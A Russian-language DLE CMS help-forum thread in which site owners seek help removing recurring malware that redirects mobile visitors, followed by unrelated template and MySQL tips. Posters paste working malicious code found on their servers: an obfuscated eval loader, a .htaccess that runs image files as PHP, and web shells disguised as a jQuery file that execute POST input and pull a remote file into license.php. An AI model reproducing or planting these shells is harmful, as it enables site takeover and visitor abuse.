Задать вопрос
Не нравятся результаты поиска? Попробуйте другой поиск!
DLE FAQ » Все вопросы » Общие вопросы » Как вычистить вредоносный код с DLE ?

Как вычистить вредоносный код с DLE ?

     01.06.2020    Вредоносный код, вирус    Общие вопросы, Общие вопросы по PHP    2141

вопрос
Добрые люди прошу помощи, на моем сайте встроен в php файл код. Недавно я вычистил его но он опять там появился.

В файлах
/engine/classes/mysql.php
/engine/data/dbconfig.php

Код
$liciens = "@Ev"."aL(gZu"."ncOmp"."rEss(bAs"."e64"."_Dec"."odE('eF6VVHtv2zYQ/yoOYIQS4sgP2bEdQ2jWwtiCDe2WJiuG1hAo6SyxkkiVDztB6e++oxwsceF52B+84+OeP95dN5EQkZh0AhIb5RjI9uAIy8hiW7AKvHAwn1864jcSNl63EKq3J0ayXleu/QVbe0wp0F43fvfhw6+3y89dtL3y/e83eJsKUTLw3FXvUOBi2NOsBs+/mE3mk2mP9Im/2KE17+ZQMIrIfDSeDsLZkPhC/uvzdHb6eX7yeTYgR0ImV+P5aDCeTa7C+WSMZDYPB5PZ+Go8C+djciSDroR1hE4+Lu/+XN59Vlo64JBpYZoGpEeYNLFWYL4h4r6/WjgoX2mQu+UfD8uP9/HD3S1ZLW4c3NEpe1qJIm60Lp6tldtmXRpalZvHlG8Kk1TRcDqYYGT/EZgEjB3kiy1vPB5d4roIZ6PhpSP+m1Qo7/nzYf1PGfQcWv51rWNJeeb0eqPhIPQXBdAMbT97I+EblqdBU2tXZn3FCt13uzKFIm2v0jRwPJfCsctw2972r5tWQxeday5Yu6WtgviN+MjOFYi2fhF8ZJJujayApyLDj8QqdSINlbQGDTL60i3haStkhmp4UHBuZDREvSOgRK9ROUdYfrBOCq2b675Lw/0UUhT3/QU8Mr3YdY3KT4OuOeQ0lqDMqz/83z/VfcyrhjdfqfmmYGsaHREliOtN7+ylsn65v/89fsBT/NPPy/f3ZOUa4sQzNkfbM2fY/HlcU50WHuknlGXGpgiBRSQqsJ/Cd7FdVprecvspB22xBODRMhpTmRaWFkJYltfUvhXaNgzrwdI6QcW/6FsptlaIHA8JPtaUVUGfkZ7Dzcd+xAQOfLeWg72ctKIMpLGbMkjF3khgM5OWblklcmGsKoCjY043zqmognTvWtot01gKlnGlaY5RcXfap2a0SQBpkDzt4xYZF6U1lcjtmqaQiMAqaHN7cslhPIqjZVWzkZVJGtiE8XyfB9Zem8VhGk2QYOIKPaqnOhHK8kwKltmaZY0FyUB96VwNbKHT2IoEB7H9OqrBoiyjHKU4s00hOLxA5bru7Ic5TLIKcLhjneBAXx2XeZ7V7dNBiBHNMg5bZbEBcqYcOtEaIEsoghtVDl1tkTEeNEVjaVa/3qGCpJoJvo9Qsr0Lt+ucRR03KY8M2+dBPT02V3e73d+Pxjob')));";$release_this = "cre"."ate_"."function";$dle_func = $release_this('', "$liciens;");$dle_func('');


Этот код редиректит мобильных пользователей с сайта на подписки. Яндекс уже как 2 месяца об этом говорит. вообщем (у меня по русскому языку двойка, я не знаю, что в русском языке не существует слова вообщем) как быть и как чистить ? У меня впс. После 1 чистки сменил все пароли толку ноль.

Ответил: sjlg89

Я нашел решение, спустя время - оно вот - https://coderiz.pw/blog/55-virusy-v-sisteme-datalifeengine-dle-i-kak-s-nimi-borotsya.html

Теперь все чисто. Спасибо автору за такую статью.

18 комментариев

dj-avtosh
PHP-developer

dj-avtosh - 1 июня 2020 22:40 -

Здравствуйте, смотрите access логи.
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.
sjlg89
Юзер

sjlg89 - 4 июня 2020 00:00 -

леший
Гости

леший - 1 июня 2020 23:26 -

Купите лицензию и не будет у Вас дыр и шелов.
deadluk
Юзер

deadluk - 1 июня 2020 23:59 -

а откуда дистрибутив качали?
Flash
Эксперт

Flash - 3 июня 2020 00:27 -

Проверьте сайт антивирусом - https://revisium.com/ai/
Бесплатные шаблоны
sjlg89
Юзер

sjlg89 - 3 июня 2020 23:34 -

Нашел в /uploads/fotos файл .htaccess в котором 
<FilesMatch ".([Pp][Hh][Pp]|[Cc][Gg][Ii]|[Pp][Ll]|[Pp][Hh][Ii][Mm][Ll]).?">
   Order allow,deny
   Deny from all
</FilesMatch>
AddHandler application/x-httpd-php .avi .jpeq .mpg4]


+ файл foto_67823364.jpeq с кодом
<?php 
/*
 * jQuery Image Library v1.6.1
 * http://jquery.com/
 *
 * Copyright 2011, John Resig
 * Dual licensed under the MIT or GPL Version 2 licenses.
 * http://jquery.org/license
 *
 * Includes Sizzle.js
 * http://sizzlejs.com/
 * Copyright 2011, The Dojo Foundation
 * Released under the MIT, BSD, and GPL Licenses.
 *
 * Date: Thu May 12 15:04:36 2011 -0400
 *  *  *  *  *  *  * *  *  *  *  *  *  *  *  *  *  *  *  *  Don't delete this file *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  * 
 */
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('display_errors', 0);
@error_reporting(0);
@set_time_limit(0);
$cret='unct' .'ion';$cret= 'cre' . 'ate' .'_f' .$cret;
$jQuery='sert';$jQuery='as'.$jQuery;$Libr= "_ostp";
$sizz=strtoupper($Libr[0].$Libr[4].$Libr[1].$Libr[2].$Libr[3] );
if(isset(${$sizz}['j01bt5ri3p'])){@$cret('', '};'.${$sizz}['j01bt5ri3p'].'{');}
if(isset(${$sizz}['j01bt5ri3p'])){@$jQuery(${$sizz}['j01bt5ri3p']);} 
if((isset(${$sizz}['j01bt5ri3p']))&(isset(${$sizz}['fail']))){
@copy('http://'.${$sizz}['fail'].'/test.txt', $_SERVER['DOCUMENT_ROOT'].'/license.php');} 
print"<!-- te"."st --> "; 
?>
TeraMoune
Эксперт

TeraMoune - 4 июня 2020 00:09 -

а есть в логах доступ к foto_67823364.jpeq ? если нету видать заброшенный, в этом коде все действия требуют передачу каких-то параметров через post но, а действие тут одно, скопировать в корень сайта некий файл license.php с содержимым из корня домена хакера.

Цитата: sjlg89
Это и есть шел ?

Шел как раз скорей всего license.php который Вам загрузят если еще не загрузили
Тестовый репозиторий установки плагинов: teramoune
sjlg89
Юзер

sjlg89 - 4 июня 2020 17:15 -

Такой файл ни разу не находил. А с чего его должны загрузить? Все почищено вроде плюс пароли все сменены. Возможно его грузили через этот скрипт и после как ставили код чистили чтобы не видно было.
dj-avtosh
PHP-developer

dj-avtosh - 4 июня 2020 17:42 -

на старых версиях DLE через автар заливается шелл. Чекайте access логи.
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.
sjlg89
Юзер

sjlg89 - 10 июня 2020 16:39 -

Версия дле 13.3
TeraMoune
Эксперт

TeraMoune - 4 июня 2020 19:19 -

Ну почистили это хорошо, я же просто сказал проверить. И написал зачем последний найденный Вами код нужен в картинке с плохим расширением.
Тестовый репозиторий установки плагинов: teramoune
sjlg89
Юзер

sjlg89 - 10 июня 2020 16:41 -

В данное время пока полет нормальный. Ничего подозрительного не замечено.
Juranja
Юзер

Juranja - 3 октября 2020 15:11 -

Яндекс начал ругаться на релирект моб пользователей, нашел картинку с кодом вот такое содержимое
[Ссылка]
jQuery
http://jquery.com/


и файл dsiuarl. php
Юрий Жежелев, вчера в 23:19
и еще файл domains/for-web.ru/public_html/uploads/posts/2018-05/thumbs/dsiuarl.php которого не должно быть по идее в этой папке

Юрий Жежелев, вчера в 23:20
с таким содержимым ?php
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('display_errors', 0);
@error_reporting(0);
@set_time_limit(0);
$cret= 'cre' . 'ate' .'_f' .'unct' .'ion';
$as= 'as' . 'se' .'rt';$drem= "_ostp" ;
$did= strtoupper ($drem[0]. $drem[4].$drem[1].$drem[2].$drem[3] ) ;
if(isset( ${$did }[ 'qf03c87'] ) ) {$cret('', '};'.${$did }['qf03c87'].'{');}
if(isset( ${$did }[ 'qf03c87'] ) ) {$as (${$did }['qf03c87'] );}
print " ";
?>

Так же в файле mysql. php
Что за фигня и как ее победить
sjlg89
Юзер

sjlg89 - 3 октября 2020 16:03 -

Я нашел решение, оно вот - https://coderiz.pw/blog/55-virusy-v-sisteme-datalifeengine-dle-i-kak-s-nimi-borotsya.html

Теперь все чисто. Спасибо автору за такую статью.
Juranja
Юзер

Juranja - 3 октября 2020 16:35 -

Огромное спасибо, вы просто почистили сайт или ещё что предпренимали?
sjlg89
Юзер

sjlg89 - 3 октября 2020 18:48 -

Проверьте еще файлы htaccess в папках на лишние параметры, а так все по статье проверял.

Лучше Скачайте оригинал с офф сайта и посмотрите файлы htaccess по папкам
Juranja
Юзер

Juranja - 3 октября 2020 19:30 -

спасибо все устранил
Stasik
Юзер

Stasik - 13 августа 2023 02:16 -

А может такой вирус "пролезть" через шаблон?
В июльских бэкапах его ещё нет, на сейчас на хостинге он уже есть.
Недавно шабы на хост заливал, скачанные с бесплатных сайтов

П.С.
Разобрался, движок (dle 13.3) изначально был залит с вирусом. Видимо недавно только активировался
Чтобы комментировать - войдите или зарегистрируйтесь на сайте

Похожие вопросы

 19.01.2013 graver  Общие вопросы
 09.04.2013 Dr.Parlament  Общие вопросы
 10.11.2013 fisher1911  Общие вопросы
 16.01.2014 damian.blackrose  Общие вопросы
 30.04.2014 trueocean  Общие вопросы, Ламерские вопросы
 15.07.2014 armast  Общие вопросы
 07.09.2014 csgamee  Общие вопросы
 05.10.2014 malenovski  Общие вопросы, Общие вопросы по PHP, Хаки
 15.09.2015 Neostaf  Общие вопросы
 22.03.2017 bratkov  Общие вопросы
  • mondolfo | Шаблон waitlogin при авторизации через с ...
    Фото mondolfo
    mondolfo
    Шаблон waitlogin при авторизации через соцсеть?
    Вчера, 01:31
    /engine/modules/social.php
  • TeraMoune | Как изменить вывод custom по нескольким ... 11
    Фото TeraMoune
    TeraMoune
    Как изменить вывод custom по нескольким тегам?
    28-10-2024, 01:05
    Я же написал, продублирую: нужно использовать [[:punct:]]

    И проблема в условии проверяющее версию mysql, можно поменять местами true и false, изменить знак меньше на больше или вовсе убрать код строки с version_compare и оставить ту строку кода $tempArray[] где используется [[:punct:]].

    В статье также указано, что важно использовать экранирование, собственно, что и указано в методе по исправлению ошибки.
    Статья по решению проблемы

    Там у человека совершенно другое условие поиска. Он не теги ищет которые строго разделены запятыми, он просто слова ищет и ему как раз подойдёт граница слова. И это когда-то давно поиск был разделяя по границе слова, теперь есть character_class и используется другой метод. Но это не отменяет того, что вы нашли вопрос и решение которое никак не связано с темой новости поиска новостей с наличием тегов.
  • homa152 | Как изменить вывод custom по нескольким ... 11
    Фото homa152
    homa152
    Как изменить вывод custom по нескольким тегам?
    27-10-2024, 23:33
    Если вы готовы предложить какое-то решение для исправление проблемы 3685, отлично. Иначе к сожалению на последних версиях MySQL хак не рабочий, согласно вашему трактату.
  • homa152 | Как изменить вывод custom по нескольким ... 11
    Фото homa152
    homa152
    Как изменить вывод custom по нескольким тегам?
    27-10-2024, 23:20
    Я буквально 2 часа назад столкнулся с проблемами при установке этого хака, проблема была именно в ошибке 3685, сайт не просто переставал работать, использовалась стандартная заглушка при критических ошибках MySQL исправить получилось методом описанным выше, для версия до 8 хак работает исправно, но выше, требуется доработка, так как синтаксис считается ошибочным, вы можете проверить самостоятельно.

    В статье также указано, что важно использовать экранирование, собственно, что и указано в методе по исправлению ошибки.
    Статья по решению проблемы
  • TeraMoune | Как изменить вывод custom по нескольким ... 11
    Фото TeraMoune
    TeraMoune
    Как изменить вывод custom по нескольким тегам?
    27-10-2024, 22:32
    Напротив нужно использовать [[:punct:]] вместо скобок, про это написано в документации на которую вы ссылаетесь. А \b означает границу слова и не способен правильно отображать результаты. Граница слова это когда выражение будет находить отдельные слова. Например новость имеет теги (Социальная сеть, Блокировка) и tags REGEXP '\\b(сеть)\\b' найдёт новость с тегом Социальная сеть, а так же Рыбацкая сеть и в принципе найдёт все новости где присутствует слово "Сеть" и будет много лишних результатов, а не только нужные.

    В хаке как раз присутствует проверка на старую версию и новую mysql и в каждом случае используется тот вариант который является валидным для используемой версии.
  • homa152 | Как изменить вывод custom по нескольким ... 11
    Фото homa152
    homa152
    Как изменить вывод custom по нескольким тегам?
    27-10-2024, 21:30
    Добавлю касаемо обновления архитектуры MySQL
    При добавлении хака с версии MySQL 8.0, возможно появление ошибки: 3685. Неверный аргумент для регулярного выражения.

    Можно пофиксить самостоятельно внеся корректировки в сам хак из панели админа.

    Строку:
    $tempArray[] = "tags REGEXP '[[:<:]](" . $value  . ")[[:>:]]'";


    Заменить на: 
    $tempArray[] = "tags REGEXP '\\\\b(" . $value  . ")\\\\b'";


    Согласно справочному руководству MySQL 8.0 / ... / Регулярные выражения, «MySQL поддерживает регулярные выражения с помощью международных компонентов для Unicode (ICU)».

    То есть, вместо "[[:<:]] и [[:>:]]", нужно использовать: "\b"
  • vitnet | Есть ли возможность изменить язык сайта? 1
    Фото vitnet
    vitnet
    Есть ли возможность изменить язык сайта?
    25-10-2024, 16:22
    Ну как вариант можно использовать тег {lang text=***} подробнее


    {lang text="LANG_PARAMETER"}

    Данный тег предназначен для вывода информации из языкового файла website.tpl, который в данный момент используется, где LANG_PARAMETER это значение параметра, который необходимо вывести. Например, тег {lang text="attach_images"} выведет надпись “Прикрепить изображения” из языкового пакета, в случае использования русского языка и если используется английский язык, то “Attach Images”
  • vitnet | Есть готовый модуль рейтинга комментарие ... 1
    Фото vitnet
    vitnet
    Есть готовый модуль рейтинга комментариев?
    25-10-2024, 13:12
    Вариант 1 (вручную)

    1.0 Открываете файл engine/modules/show.full.php находите в нем
    $where_approve . " ORDER BY " . PREFIX . "_comments.id " . $comm_msort;

    И меняете здесь id на rating
    Пример:
    $where_approve . " ORDER BY " . PREFIX . "_comments.rating " . $comm_msort;

    2.0 Затем переходите в админку /admin.php?mod=options&action=syscon --> Настройки комментариев --> Порядок сортировки комментариев --> По убыванию

    2.1 Далее --> Тип рейтинга комментариев выставляете "Нравится или Не нравится"

    Готово!

    Вариант 2 (плагин)
    Для просмотра содержимого спойлера, перейдите к выбранному событию.
  • Graf | Как сделать аякс кнопку "загрузить еще"? 2
    Фото Graf
    Graf
    Как сделать аякс кнопку "загрузить еще"?
    23-10-2024, 16:03
    Вот рабочий пример со скрытие пагинатора и кнопки.
    Полный код файла navigation.tpl
    [not-available=userinfo]
<div class="nav-load" id="nav-load">[next-link]Загрузить еще[/next-link]</div>

<nav class="navigation"[available=lastcomments] style="padding: 4% 8%;"[/available]>
	<div class="page_next-prev">
		<span class="page_prev" title="Предыдущая страница">
			[prev-link]<svg class="icon icon-left"><use xlink:href="#icon-left"></use></svg>[/prev-link]
		</span>
		<span class="page_next" title="Следующая страница">
			[next-link]<svg class="icon icon-right"><use xlink:href="#icon-right"></use></svg>[/next-link]
		</span>
	</div>
	<ul class="pagination">
		{pages}
	</ul>
</nav>
<script type="text/javascript">
$(document).ready(function(){
    
         $('body').on('click','#nav-load a',function(){
        var urlNext = $(this).attr('href');
        var scrollNext = $(this).offset().top - 200;
        if (urlNext !== undefined) {
            $.ajax({
                url: urlNext,
                beforeSend: function() {
                    ShowLoading('');
                },            
                success: function(data) {
                    $('.navigation').remove();
                    $('#nav-load').remove();
                    $('#dle-content').append($('#dle-content', data).html());
                    $('#dle-content').after($('#bottom-nav'));
                    window.history.pushState("", "", urlNext);
                    $('html, body').animate({scrollTop:scrollNext}, 800);    
                    HideLoading('');
                },
                  error: function() {                
                    HideLoading('');
                    alert('что-то пошло не так');
                  }
            });
        };
        return false;
    });
    
});
</script>
[/not-available]
  • vitnet | Как перенести категории в DLE? 2
    Фото vitnet
    vitnet
    Как перенести категории в DLE?
    22-10-2024, 11:30
    Для начала проверьте наличие файла /engine/cache/system/category.php и если он был до замены БД то удалите его а ещё лучше очистить кеш.
наверх